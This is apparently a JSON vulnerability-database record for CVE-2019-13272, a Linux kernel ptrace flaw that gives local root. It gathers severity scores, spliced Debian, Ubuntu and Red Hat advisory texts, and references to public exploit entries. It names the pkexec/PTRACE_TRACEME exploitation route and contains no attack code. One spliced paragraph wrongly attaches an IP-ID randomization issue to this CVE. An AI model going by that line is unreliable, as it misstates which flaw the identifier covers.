            "trust": 1.9,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-13272",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-13272",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-13272",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2019-13272",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-13272",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201907-809",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-13272",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit\u0027s pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments. Linux Kernel Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. \n\nFor the oldstable distribution (stretch), this problem has been fixed\nin version 4.9.168-1+deb9u4. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 4.19.37-5+deb10u1. This update includes as well a patch for a\nregression introduced by the original fix for CVE-2019-11478 (#930904). \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl0zJkBfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0SvYw/8CJrPtf7juWLaRa3m/LvFewU+BppoJqNaVUbQNXVT90PgH/zDWVbpkJ4g\nTr4MW6tzRKnAfUS+jObsnR9jGo871ZZ2wtlcM3W0bMnCwK6tPnTGiqTauflPXf2X\nKW8V3YLI6W6MxPlSLa2EQkDJ/RfTke4SwQDFDX0lzYjC5LwCwDwKIWBC6P5xBg6w\nyxNh6PHv9++ES8SKYpU3oMlWG43fJZJ8Oyy7Wdk0H84Qcjxb8FDP2iWyRf0Mvb+5\n1uFosUswfN89imMrIFdYhv/z7CYFeHgYA0lPIvQ1gpNWOflrGqoMYL1Pys95mVCV\nRdRBtWy2atPHos6HEgw85cxaTS9Ss9FYB0sL+QCqIdw5ZwTt5+QR+JLNvJ53VKEm\nBxE5TncjlEAOc9t74xti/vBW2eCjp7IPaMP8X8eqWKiaMGJBlwaJEPUSmL4SiZo+\ncW1plAYxc0CYq4lDWo3fcR7tBMQfp1ffDYUNn3DXvHChF1Ebi3zIdGl+oSeNP8hW\nOuaH6/P+qko0S/TNXAK5uaekrzjYv2pWm6xoM10fMVXiT8GiyjIGmSTTu6WvaiCA\nITdy+o/jAfBiQsdFer2MYUna8QxjOy3XClKsy9+yjrj8ciekC4nOPHdz3/CYfOha\ncojPRl2Qd2KSWfEUoze2IqPrr3iAnKFKH6a+WU1XQZuo6r3uo0Q=\n=fTIm\n-----END PGP SIGNATURE-----\n. 8) - x86_64\n\n3. =========================================================================\nUbuntu Security Notice USN-4094-1\nAugust 13, 2019\n\nlinux, linux-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-kvm,\nlinux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems\n- linux-gke-4.15: Linux kernel for Google Container Engine (GKE) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-oem: Linux kernel for OEM processors\n- linux-oracle: Linux kernel for Oracle Cloud systems\n- linux-raspi2: Linux kernel for Raspberry Pi 2\n- linux-snapdragon: Linux kernel for Snapdragon processors\n- linux-azure: Linux kernel for Microsoft Azure Cloud systems\n- linux-hwe: Linux hardware enablement (HWE) kernel\n\nDetails:\n\nIt was discovered that the alarmtimer implementation in the Linux kernel\ncontained an integer overflow vulnerability. A local attacker could use\nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use this\nto construct a malicious XFS image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could\nuse this to construct a malicious f2fs image that, when mounted,\ncould cause a denial of service (system crash). (CVE-2018-13097,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14616,\nCVE-2018-13096, CVE-2018-13098, CVE-2018-14615)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system\nimplementation in the Linux kernel did not properly validate\nmetadata. An attacker could use this to construct a malicious\nbtrfs image that, when mounted, could cause a denial of service\n(system crash). (CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613, CVE-2018-14609)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in\nthe Linux kernel did not properly validate elliptic curve parameters during\nDiffie-Hellman key exchange in some situations. An attacker could use this\nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nAndrei Vlad Lutas and Dan Lutas discovered that some x86 processors\nincorrectly handle SWAPGS instructions during speculative execution. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-1125)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-12614)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed in\nthe Near-field communication (NFC) implementation in the Linux kernel. An\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel\nimproperly dropped a device reference in an error condition, leading to a\nuse-after-free. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in\nthe Near-field communication (NFC) implementation in the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel\nwhen accessing LDT entries in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did\nnot properly record credentials in some situations. A local attacker could\nuse this to cause a denial of service (system crash) or possibly gain\nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free vulnerability\nwhen disconnecting the device. An attacker could use this to cause a denial\nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the\nLinux kernel did not properly validate control bits, resulting in an out of\nbounds buffer read. A local attacker could use this to possibly expose\nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux\nkernel did not properly prevent kernel addresses from being copied to user\nspace. A local attacker with the CAP_NET_ADMIN capability could use this to\nexpose sensitive information. (CVE-2018-20511)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1021-oracle  4.15.0-1021.23\n  linux-image-4.15.0-1040-gcp     4.15.0-1040.42\n  linux-image-4.15.0-1040-gke     4.15.0-1040.42\n  linux-image-4.15.0-1042-kvm     4.15.0-1042.42\n  linux-image-4.15.0-1043-raspi2  4.15.0-1043.46\n  linux-image-4.15.0-1050-oem     4.15.0-1050.57\n  linux-image-4.15.0-1060-snapdragon  4.15.0-1060.66\n  linux-image-4.15.0-58-generic   4.15.0-58.64\n  linux-image-4.15.0-58-generic-lpae  4.15.0-58.64\n  linux-image-4.15.0-58-lowlatency  4.15.0-58.64\n  linux-image-gcp                 4.15.0.1040.42\n  linux-image-generic             4.15.0.58.60\n  linux-image-generic-lpae        4.15.0.58.60\n  linux-image-gke                 4.15.0.1040.43\n  linux-image-gke-4.15            4.15.0.1040.43\n  linux-image-kvm                 4.15.0.1042.42\n  linux-image-lowlatency          4.15.0.58.60\n  linux-image-oem                 4.15.0.1050.54\n  linux-image-oracle              4.15.0.1021.24\n  linux-image-powerpc-e500mc      4.15.0.58.60\n  linux-image-powerpc-smp         4.15.0.58.60\n  linux-image-powerpc64-emb       4.15.0.58.60\n  linux-image-powerpc64-smp       4.15.0.58.60\n  linux-image-raspi2              4.15.0.1043.41\n  linux-image-snapdragon          4.15.0.1060.63\n  linux-image-virtual             4.15.0.58.60\n\nUbuntu 16.04 LTS:\n  linux-image-4.15.0-1021-oracle  4.15.0-1021.23~16.04.1\n  linux-image-4.15.0-1040-gcp     4.15.0-1040.42~16.04.1\n  linux-image-4.15.0-1055-azure   4.15.0-1055.60\n  linux-image-4.15.0-58-generic   4.15.0-58.64~16.04.1\n  linux-image-4.15.0-58-generic-lpae  4.15.0-58.64~16.04.1\n  linux-image-4.15.0-58-lowlatency  4.15.0-58.64~16.04.1\n  linux-image-azure               4.15.0.1055.58\n  linux-image-gcp                 4.15.0.1040.54\n  linux-image-generic-hwe-16.04   4.15.0.58.79\n  linux-image-generic-lpae-hwe-16.04  4.15.0.58.79\n  linux-image-gke                 4.15.0.1040.54\n  linux-image-lowlatency-hwe-16.04  4.15.0.58.79\n  linux-image-oem                 4.15.0.58.79\n  linux-image-oracle              4.15.0.1021.15\n  linux-image-virtual-hwe-16.04   4.15.0.58.79\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4094-1\n  CVE-2018-13053, CVE-2018-13093, CVE-2018-13096, CVE-2018-13097,\n  CVE-2018-13098, CVE-2018-13099, CVE-2018-13100, CVE-2018-14609,\n  CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\n  CVE-2018-14614, CVE-2018-14615, CVE-2018-14616, CVE-2018-14617,\n  CVE-2018-16862, CVE-2018-20169, CVE-2018-20511, CVE-2018-20856,\n  CVE-2018-5383, CVE-2019-10126, CVE-2019-1125, CVE-2019-12614,\n  CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, CVE-2019-13233,\n  CVE-2019-13272, CVE-2019-2024, CVE-2019-2101, CVE-2019-3846\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/4.15.0-58.64\n  https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42\n  https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1040.42\n  https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1042.42\n  https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1050.57\n  https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23\n  https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1043.46\n  https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1060.66\n  https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1055.60\n  https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1040.42~16.04.1\n  https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-58.64~16.04.1\n  https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1021.23~16.04.1\n. (CVE-2019-10126)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless networking\nprotocols. (CVE-2019-13272)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 54.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 54.1     | generic, lowlatency      |\n| 4.4.0-151.178            | 54.1     | lowlatency, generic      |\n| 4.4.0-154.181            | 54.1     | lowlatency, generic      |\n| 4.4.0-157.185            | 54.1     | lowlatency, generic      |\n| 4.15.0-50.54             | 54.2     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 54.2     | generic, lowlatency      |\n| 4.15.0-51.55             | 54.2     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 54.2     | generic, lowlatency      |\n| 4.15.0-52.56             | 54.2     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 54.2     | generic, lowlatency      |\n| 4.15.0-54.58             | 54.2     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 54.2     | generic, lowlatency      |\n| 4.15.0-55.60             | 54.2     | generic, lowlatency      |\n\nReferences:\n  CVE-2018-1129, CVE-2019-2101, CVE-2019-3846, CVE-2019-10126, \n  CVE-2019-12614, CVE-2019-12818, CVE-2019-12819, CVE-2019-12984, \n  CVE-2019-13272\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel-alt security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2019:2809-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:2809\nIssue date:        2019-09-20\nCVE Names:         CVE-2019-5489 CVE-2019-6974 CVE-2019-13272\n====================================================================\n1. Summary:\n\nAn update for kernel-alt is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le\n\n3. Description:\n\nThe kernel-alt packages provide the Linux kernel version 4.x. \n\nSecurity Fix(es):\n\n* Kernel: page cache side channel attacks (CVE-2019-5489)\n\n* Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n(CVE-2019-6974)\n\n* kernel: broken permission and object lifetime handling for PTRACE_TRACEME\n(CVE-2019-13272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [kernel-alt]: BUG: unable to handle kernel NULL pointer IP:\ncrypto_remove_spawns+0x118/0x2e0 (BZ#1536967)\n\n* [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages\n(BZ#1610534)\n\n* RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration\n/ powerpc/pseries/mobility: Extend start/stop topology update scope (LPM)\n(BZ#1673613)\n\n* RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in\nFIPS mode (BZ#1673979)\n\n* RHEL-Alt-7.6 - System crashed after oom - During ICP deployment\n(BZ#1710304)\n\n* kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)\n\n* RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3\ncores in quad and misses last core. (CORAL) (BZ#1717836)\n\n* RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN\n(BZ#1717906)\n\n* fragmented packets timing out (BZ#1729066)\n\n* Backport TCP follow-up for small buffers (BZ#1733617)\n\nEnhancement(s):\n\n* RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading\nnest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1664110 - CVE-2019-5489 Kernel: page cache side channel attacks\n1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n1730895 - CVE-2019-13272 kernel: broken permission and object lifetime handling for PTRACE_TRACEME\n\n6. Package List:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nkernel-alt-4.14.0-115.12.1.el7a.src.rpm\n\naarch64:\nkernel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-headers-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-libs-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-abi-whitelists-4.14.0-115.12.1.el7a.noarch.rpm\nkernel-doc-4.14.0-115.12.1.el7a.noarch.rpm\n\nppc64le:\nkernel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-bootwrapper-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-headers-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-libs-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\n\ns390x:\nkernel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debuginfo-common-s390x-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-devel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-headers-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-devel-4.14.0-115.12.1.el7a.s390x.rpm\nperf-4.14.0-115.12.1.el7a.s390x.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\npython-perf-4.14.0-115.12.1.el7a.s390x.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-libs-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-doc-4.14.0-115.12.1.el7a.noarch.rpm\n\nppc64le:\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-libs-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYS+G9zjgjWX9erEAQgWLQ/9E1IoTs6bpakJ6GIPIMJUeYDCRpXLRrHt\nCAdDGt7wQ2l5PUY2R98fiCs266c8Vaiqll6PDbFRDwHEI4gSkYnemdC3pdD/u1ct\nKEch6TBhUejC52t/Zvq2hrUItEj1oz35mVTv+cHHfX9HqVTdV+1SeOR+WoETy+I4\nqdBKOSPybxtisp9fdczX0F3uzAfpHqCFVZ2OSvPJmDCZU20gjF+1h+HiyvS4iWT1\nqrlMFQ1EliSMbjO/pCTj6PHIcOUNPg7tkx72s5E0qRd4Ja10nZ7QNUh8VGGHNQxb\nUYLfM7GojPgWx2UzjLo6EU5a9/Xuo6rwgTE5hKWGqZCm645RSv71tpTbdZJe6vnS\ncyzGIV7NtIvMF625LvimVBB/BSXZK3vYpSuBtcPnvKg2wAet83fIzQ4PtwBpzP7p\nNfFLvedXg2CRZIYbi5u6tzCqE2UKDpfvKWry8MyELDpt4b4iZEbHt0S4ZdfKzOvu\najvY2VuM414x0FZpWCEHFXT7dbcilf2ZBg0g0UgazRhumm9utfBsbmQz0fS7GcML\nEf3YRj97YJPhGoeAQ8b+ox8Z+Q/J+/39smr94scd9FjhotlQgVh9zmd6c4IzisEE\niwtg6J38bOHzXi9q3x3Fw4FTe6kUQHeOw9703w/EqojumKVCVCX6VoZ0tmAt720O\nItDqWovzGmk=yv43\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154043"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "154245"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      }
    ],
    "trust": 2.25
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47133",
        "trust": 0.3,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-13272",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154245",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153663",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "156929",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154957",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "153702",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "165051",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4646",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2749",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50541",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47163",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47133",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-29592",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13272",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153699",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153970",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154043",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154316",
        "trust": 0.1
      },
      {
